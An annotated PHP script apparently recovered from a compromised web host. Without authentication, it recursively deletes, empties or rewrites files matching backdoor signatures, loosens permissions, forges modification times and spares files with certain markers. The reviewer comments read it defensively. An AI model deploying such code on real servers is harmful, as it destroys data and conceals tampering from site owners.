Current Path : /var/www/html/clients/amz.e-nk.ru/ |
Current File : /var/www/html/clients/amz.e-nk.ru/xsas.php |
<?php
/**
 * Recursive "cleaner": walks the web server's document root and deletes,
 * empties or rewrites files whose contents match a fixed set of
 * injected-code signatures.
 *
 * Reviewer notes (defensive reading of the code below):
 *  - No authentication or authorisation check is visible, so any request
 *    that reaches this file starts a walk over the whole document root.
 *  - Directories and files that are not writable are chmod'ed to 0755 / 0644
 *    and never restored, so permission hardening is lost on every run.
 *  - Rewritten files get their previous modification time put back, so
 *    mtime alone does not show which files were changed. Compare against
 *    known-good hashes or a clean release instead.
 *  - Files containing "listFolders", "0555" or "paypal.gif" are returned
 *    from early and left unmodified.
 *  - Finding this file on a host means the site needs a full integrity
 *    review; the signature list here is not evidence that the site is clean.
 */
session_start();
// Sets a flag in the visitor's session; nothing in this file reads it back.
// NOTE(review): presumably consumed by another script. Confirm, and use the key name as a search string.
$_SESSION['secretyt'] = true;
// Reset the opcode cache when the extension is available.
if(function_exists("opcache_reset"))opcache_reset();
// Remove the execution time limit and keep running after the client disconnects,
// so the walk continues even if the HTTP request is closed.
set_time_limit(0);
ignore_user_abort(true);

/**
 * Recursively visit every entry below $dir and pass each non-directory to handle().
 *
 * @param string $dir Directory to walk (no trailing slash is added or removed here).
 */
function listFolders($dir){
    // Force the directory writable if it is not; chmod errors are suppressed.
    if(!is_writable($dir))@chmod($dir, 0755);
    // NOTE(review): the scandir() result is not checked before the loop.
    $ffs = scandir($dir);
    foreach($ffs as $ff){
        if($ff == "." || $ff == "..") continue;
        $d = $dir."/".$ff;
        if(is_dir($d)) {
            // NOTE(review): is_dir() follows symlinks, so the walk can leave the document root. Verify on the affected host.
            listFolders($d);
        }else{
            handle($dir,$d);
        };
    }
}

/**
 * Inspect one file and, depending on what it contains, skip it, report it,
 * delete/empty it, or strip matching code from it and write it back.
 *
 * @param string $dir Directory containing the file.
 * @param string $f   Full path of the file.
 */
function handle($dir,$f){
    // Loosen permissions on both the directory and the file if needed.
    if(!is_writable($dir))@chmod($dir, 0755);
    if(!is_writable($f))@chmod($f, 0644);

    // Any path containing this substring is emptied and deleted without
    // looking at its contents.
    // NOTE(review): edit.php is not expected under wp-includes. Verify against a clean WordPress release.
    if(strpos($f,"wp-includes/edit.php")!==false){
        file_put_contents($f,"");
        @unlink($f);
        return;
    }

    // Whole file is read into memory; the return value is not checked.
    $d = file_get_contents($f);

    // Skip anything that mentions "listFolders" (case-insensitive). This
    // script itself contains that name, so it never modifies itself.
    if(preg_match("@listFolders@i",$d)){
        return;
    }

    // Files containing either marker are only printed, never modified.
    if(strpos($d,"0555")!==false || strpos($d,"paypal.gif")!==false){
        echo $f."<br>";
        return;
    }

    // Signature set 1, four alternatives (flags i and m; no s flag, so "."
    // does not cross a newline and each alternative must match on one line):
    //   1. a PHP block containing the text ">ok<" in double quotes
    //   2. the literal string b66bb6bbb
    //   3. a PHP block using goto and ending in the label "CHnzG: }"
    //   4. a line that starts with the PHP open tag and reaches "goto <label>"
    if(preg_match("@<\?php.+?\">ok<\".+?\?>|b66bb6bbb|<\?php.+?goto.+?CHnzG: \}|^<\?php.+?goto \w+@im", $d)){
        if(!is_writable($dir))@chmod($dir, 0755);
        if(!is_writable($f))@chmod($f, 0644);
        // Try to delete; if that fails, open the path as a zip archive in
        // overwrite mode and close it straight away.
        // NOTE(review): what is left on disk after that close depends on the zip library. Confirm.
        if(!@unlink($f)){
            $zip = new ZipArchive;
            $zip->open($f, ZipArchive::OVERWRITE);
            $zip->close();
        };
        // Last resort: truncate whatever is still there.
        if(file_exists($f)){
            file_put_contents($f,"");
        }
        // There is no return here: the checks below still run against the
        // contents read earlier, and the file can be written again further down.
    }

    // Signature set 2: only files with a goto-style PHP block continue.
    if(!preg_match("@^<\?php.+?goto |<\?php.+?goto.+?\?>@im", $d)){
        return;
    }

    // Strip every single-line PHP block (open tag to closing tag) that contains goto.
    $d = preg_replace("@<\?php.+?goto.+?\?>@im","", $d);

    // Remove statements of the form @eval($_SERVER['HTTP_<name>']); which
    // execute the value of a request header as PHP code.
    if(preg_match('#\@eval\(\$_SERVER\[\'HTTP_\w+\']\);#i', $d)){
        $d = preg_replace('#\@eval\(\$_SERVER\[\'HTTP_\w+\']\);#i',"", $d);
    }

    // Any eval( still present after stripping is reported for manual review.
    if(preg_match('#eval\(#', $d)){
        echo $f."<br>";
    }

    // Comment out remaining "@eval($_SERVER" occurrences instead of deleting them.
    $d = str_replace('@eval($_SERVER', '//@eval($_SERVER', $d);

    // Remember the modification time, write the trimmed contents, then set
    // both access and modification time back to the remembered value.
    // All three calls suppress errors, so a failed write is silent.
    $t = @filemtime($f);
    @file_put_contents($f, trim($d));
    @tOuch($f, $t, $t);
}

try {
    // First deal with <document root>/wp-includes/edit.php if it exists,
    // then walk the entire document root.
    $f = $_SERVER["DOCUMENT_ROOT"]."/wp-includes/";
    if(file_exists($f."edit.php")){
        handle($f,$f."edit.php");
    }
    listFolders($_SERVER["DOCUMENT_ROOT"]);
}catch(Exception $e){
    // Only Exception is caught; its message is echoed into the response.
    echo $e->getMessage();
}